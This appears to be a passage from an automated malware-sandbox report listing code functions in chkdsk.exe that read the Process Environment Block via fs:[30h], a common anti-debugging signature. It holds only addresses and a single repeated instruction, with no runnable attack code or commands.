Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9D5E0 mov eax, dword ptr fs:[00000030h] 10_2_04D9D5E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBFD9B mov eax, dword ptr fs:[00000030h] 10_2_04DBFD9B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBFD9B mov eax, dword ptr fs:[00000030h] 10_2_04DBFD9B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E505AC mov eax, dword ptr fs:[00000030h] 10_2_04E505AC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E505AC mov eax, dword ptr fs:[00000030h] 10_2_04E505AC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h] 10_2_04D82D8A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h] 10_2_04D82D8A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h] 10_2_04D82D8A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h] 10_2_04D82D8A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h] 10_2_04D82D8A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB2581 mov eax, dword ptr fs:[00000030h] 10_2_04DB2581
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB2581 mov eax, dword ptr fs:[00000030h] 10_2_04DB2581
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB2581 mov eax, dword ptr fs:[00000030h] 10_2_04DB2581
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB2581 mov eax, dword ptr fs:[00000030h] 10_2_04DB2581
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB1DB5 mov eax, dword ptr fs:[00000030h] 10_2_04DB1DB5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB1DB5 mov eax, dword ptr fs:[00000030h] 10_2_04DB1DB5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB1DB5 mov eax, dword ptr fs:[00000030h] 10_2_04DB1DB5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB35A1 mov eax, dword ptr fs:[00000030h] 10_2_04DB35A1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA7D50 mov eax, dword ptr fs:[00000030h] 10_2_04DA7D50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC3D43 mov eax, dword ptr fs:[00000030h] 10_2_04DC3D43
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E03540 mov eax, dword ptr fs:[00000030h] 10_2_04E03540
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAC577 mov eax, dword ptr fs:[00000030h] 10_2_04DAC577
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAC577 mov eax, dword ptr fs:[00000030h] 10_2_04DAC577
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E58D34 mov eax, dword ptr fs:[00000030h] 10_2_04E58D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E0A537 mov eax, dword ptr fs:[00000030h] 10_2_04E0A537
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4E539 mov eax, dword ptr fs:[00000030h] 10_2_04E4E539
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB4D3B mov eax, dword ptr fs:[00000030h] 10_2_04DB4D3B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB4D3B mov eax, dword ptr fs:[00000030h] 10_2_04DB4D3B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB4D3B mov eax, dword ptr fs:[00000030h] 10_2_04DB4D3B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8AD30 mov eax, dword ptr fs:[00000030h] 10_2_04D8AD30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h] 10_2_04D93D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h] 10_2_04D93D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h] 10_2_04D93D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h] 10_2_04D93D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h] 10_2_04D93D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h] 10_2_04D93D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h] 10_2_04D93D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h] 10_2_04D93D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h] 10_2_04D93D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h] 10_2_04D93D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h] 10_2_04D93D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h] 10_2_04D93D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h] 10_2_04D93D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB36CC mov eax, dword ptr fs:[00000030h] 10_2_04DB36CC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC8EC7 mov eax, dword ptr fs:[00000030h] 10_2_04DC8EC7
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E3FEC0 mov eax, dword ptr fs:[00000030h] 10_2_04E3FEC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E58ED6 mov eax, dword ptr fs:[00000030h] 10_2_04E58ED6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB16E0 mov ecx, dword ptr fs:[00000030h] 10_2_04DB16E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D976E2 mov eax, dword ptr fs:[00000030h] 10_2_04D976E2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E50EA5 mov eax, dword ptr fs:[00000030h] 10_2_04E50EA5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E50EA5 mov eax, dword ptr fs:[00000030h] 10_2_04E50EA5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E50EA5 mov eax, dword ptr fs:[00000030h] 10_2_04E50EA5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E046A7 mov eax, dword ptr fs:[00000030h] 10_2_04E046A7
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1FE87 mov eax, dword ptr fs:[00000030h] 10_2_04E1FE87
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h] 10_2_04D97E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h] 10_2_04D97E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h] 10_2_04D97E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h] 10_2_04D97E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h] 10_2_04D97E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h] 10_2_04D97E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4AE44 mov eax, dword ptr fs:[00000030h] 10_2_04E4AE44
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4AE44 mov eax, dword ptr fs:[00000030h] 10_2_04E4AE44
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h] 10_2_04DAAE73
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h] 10_2_04DAAE73
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h] 10_2_04DAAE73
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h] 10_2_04DAAE73
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h] 10_2_04DAAE73
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9766D mov eax, dword ptr fs:[00000030h] 10_2_04D9766D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBA61C mov eax, dword ptr fs:[00000030h] 10_2_04DBA61C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBA61C mov eax, dword ptr fs:[00000030h] 10_2_04DBA61C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8C600 mov eax, dword ptr fs:[00000030h] 10_2_04D8C600
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8C600 mov eax, dword ptr fs:[00000030h] 10_2_04D8C600
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8C600 mov eax, dword ptr fs:[00000030h] 10_2_04D8C600
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB8E00 mov eax, dword ptr fs:[00000030h] 10_2_04DB8E00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E3FE3F mov eax, dword ptr fs:[00000030h] 10_2_04E3FE3F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41608 mov eax, dword ptr fs:[00000030h] 10_2_04E41608
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8E620 mov eax, dword ptr fs:[00000030h] 10_2_04D8E620
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC37F5 mov eax, dword ptr fs:[00000030h] 10_2_04DC37F5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D98794 mov eax, dword ptr fs:[00000030h] 10_2_04D98794
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E07794 mov eax, dword ptr fs:[00000030h] 10_2_04E07794
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E07794 mov eax, dword ptr fs:[00000030h] 10_2_04E07794
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E07794 mov eax, dword ptr fs:[00000030h] 10_2_04E07794
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E58F6A mov eax, dword ptr fs:[00000030h] 10_2_04E58F6A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9EF40 mov eax, dword ptr fs:[00000030h] 10_2_04D9EF40
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9FF60 mov eax, dword ptr fs:[00000030h] 10_2_04D9FF60
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAF716 mov eax, dword ptr fs:[00000030h] 10_2_04DAF716
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBA70E mov eax, dword ptr fs:[00000030h] 10_2_04DBA70E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBA70E mov eax, dword ptr fs:[00000030h] 10_2_04DBA70E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E5070D mov eax, dword ptr fs:[00000030h] 10_2_04E5070D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E5070D mov eax, dword ptr fs:[00000030h] 10_2_04E5070D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBE730 mov eax, dword ptr fs:[00000030h] 10_2_04DBE730
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1FF10 mov eax, dword ptr fs:[00000030h] 10_2_04E1FF10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1FF10 mov eax, dword ptr fs:[00000030h] 10_2_04E1FF10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D84F2E mov eax, dword ptr fs:[00000030h] 10_2_04D84F2E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D84F2E mov eax, dword ptr fs:[00000030h] 10_2_04D84F2E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h] 10_2_04E1B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1B8D0 mov ecx, dword ptr fs:[00000030h] 10_2_04E1B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h] 10_2_04E1B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h] 10_2_04E1B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h] 10_2_04E1B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h] 10_2_04E1B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D858EC mov eax, dword ptr fs:[00000030h] 10_2_04D858EC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D89080 mov eax, dword ptr fs:[00000030h] 10_2_04D89080
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBF0BF mov ecx, dword ptr fs:[00000030h] 10_2_04DBF0BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBF0BF mov eax, dword ptr fs:[00000030h] 10_2_04DBF0BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBF0BF mov eax, dword ptr fs:[00000030h] 10_2_04DBF0BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E03884 mov eax, dword ptr fs:[00000030h] 10_2_04E03884
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E03884 mov eax, dword ptr fs:[00000030h] 10_2_04E03884
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC90AF mov eax, dword ptr fs:[00000030h] 10_2_04DC90AF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h] 10_2_04DB20A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h] 10_2_04DB20A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h] 10_2_04DB20A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h] 10_2_04DB20A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h] 10_2_04DB20A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h] 10_2_04DB20A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA0050 mov eax, dword ptr fs:[00000030h] 10_2_04DA0050
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA0050 mov eax, dword ptr fs:[00000030h] 10_2_04DA0050
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E51074 mov eax, dword ptr fs:[00000030h] 10_2_04E51074
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E42073 mov eax, dword ptr fs:[00000030h] 10_2_04E42073
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E54015 mov eax, dword ptr fs:[00000030h] 10_2_04E54015
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E54015 mov eax, dword ptr fs:[00000030h] 10_2_04E54015
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h] 10_2_04D9B02A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h] 10_2_04D9B02A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h] 10_2_04D9B02A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h] 10_2_04D9B02A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E07016 mov eax, dword ptr fs:[00000030h] 10_2_04E07016
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E07016 mov eax, dword ptr fs:[00000030h] 10_2_04E07016
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E07016 mov eax, dword ptr fs:[00000030h] 10_2_04E07016
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h] 10_2_04DB002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h] 10_2_04DB002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h] 10_2_04DB002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h] 10_2_04DB002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h] 10_2_04DB002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E141E8 mov eax, dword ptr fs:[00000030h] 10_2_04E141E8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h] 10_2_04D8B1E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h] 10_2_04D8B1E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h] 10_2_04D8B1E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E069A6 mov eax, dword ptr fs:[00000030h] 10_2_04E069A6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB2990 mov eax, dword ptr fs:[00000030h] 10_2_04DB2990
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAC182 mov eax, dword ptr fs:[00000030h] 10_2_04DAC182
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBA185 mov eax, dword ptr fs:[00000030h] 10_2_04DBA185
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h] 10_2_04E051BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h] 10_2_04E051BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h] 10_2_04E051BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h] 10_2_04E051BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB61A0 mov eax, dword ptr fs:[00000030h] 10_2_04DB61A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB61A0 mov eax, dword ptr fs:[00000030h] 10_2_04DB61A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAB944 mov eax, dword ptr fs:[00000030h] 10_2_04DAB944
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAB944 mov eax, dword ptr fs:[00000030h] 10_2_04DAB944
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8B171 mov eax, dword ptr fs:[00000030h] 10_2_04D8B171
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8B171 mov eax, dword ptr fs:[00000030h] 10_2_04D8B171
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8C962 mov eax, dword ptr fs:[00000030h] 10_2_04D8C962
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h] 10_2_04D89100
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h] 10_2_04D89100
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h] 10_2_04D89100
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB513A mov eax, dword ptr fs:[00000030h] 10_2_04DB513A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB513A mov eax, dword ptr fs:[00000030h] 10_2_04DB513A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h] 10_2_04DA4120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h] 10_2_04DA4120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h] 10_2_04DA4120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h] 10_2_04DA4120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA4120 mov ecx, dword ptr fs:[00000030h] 10_2_04DA4120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB2ACB mov eax, dword ptr fs:[00000030h] 10_2_04DB2ACB
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB2AE4 mov eax, dword ptr fs:[00000030h] 10_2_04DB2AE4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBD294 mov eax, dword ptr fs:[00000030h] 10_2_04DBD294
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBD294 mov eax, dword ptr fs:[00000030h] 10_2_04DBD294
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9AAB0 mov eax, dword ptr fs:[00000030h] 10_2_04D9AAB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9AAB0 mov eax, dword ptr fs:[00000030h] 10_2_04D9AAB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBFAB0 mov eax, dword ptr fs:[00000030h] 10_2_04DBFAB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h] 10_2_04D852A5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h] 10_2_04D852A5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h] 10_2_04D852A5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h] 10_2_04D852A5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h] 10_2_04D852A5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E3B260 mov eax, dword ptr fs:[00000030h] 10_2_04E3B260
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E3B260 mov eax, dword ptr fs:[00000030h] 10_2_04E3B260
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E58A62 mov eax, dword ptr fs:[00000030h] 10_2_04E58A62
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h] 10_2_04D89240
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h] 10_2_04D89240
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h] 10_2_04D89240
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h] 10_2_04D89240
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC927A mov eax, dword ptr fs:[00000030h] 10_2_04DC927A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4EA55 mov eax, dword ptr fs:[00000030h] 10_2_04E4EA55
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E14257 mov eax, dword ptr fs:[00000030h] 10_2_04E14257
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA3A1C mov eax, dword ptr fs:[00000030h] 10_2_04DA3A1C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h] 10_2_04D85210
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D85210 mov ecx, dword ptr fs:[00000030h] 10_2_04D85210
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h] 10_2_04D85210
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h] 10_2_04D85210
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8AA16 mov eax, dword ptr fs:[00000030h] 10_2_04D8AA16
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8AA16 mov eax, dword ptr fs:[00000030h] 10_2_04D8AA16
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D98A0A mov eax, dword ptr fs:[00000030h] 10_2_04D98A0A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC4A2C mov eax, dword ptr fs:[00000030h] 10_2_04DC4A2C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC4A2C mov eax, dword ptr fs:[00000030h] 10_2_04DC4A2C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4AA16 mov eax, dword ptr fs:[00000030h] 10_2_04E4AA16
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4AA16 mov eax, dword ptr fs:[00000030h] 10_2_04E4AA16
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E053CA mov eax, dword ptr fs:[00000030h] 10_2_04E053CA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E053CA mov eax, dword ptr fs:[00000030h] 10_2_04E053CA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DADBE9 mov eax, dword ptr fs:[00000030h] 10_2_04DADBE9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h] 10_2_04DB03E2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h] 10_2_04DB03E2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h] 10_2_04DB03E2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h] 10_2_04DB03E2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h] 10_2_04DB03E2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h] 10_2_04DB03E2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E55BA5 mov eax, dword ptr fs:[00000030h] 10_2_04E55BA5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBB390 mov eax, dword ptr fs:[00000030h] 10_2_04DBB390
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB2397 mov eax, dword ptr fs:[00000030h] 10_2_04DB2397
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D91B8F mov eax, dword ptr fs:[00000030h] 10_2_04D91B8F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D91B8F mov eax, dword ptr fs:[00000030h] 10_2_04D91B8F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E3D380 mov ecx, dword ptr fs:[00000030h] 10_2_04E3D380
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4138A mov eax, dword ptr fs:[00000030h] 10_2_04E4138A
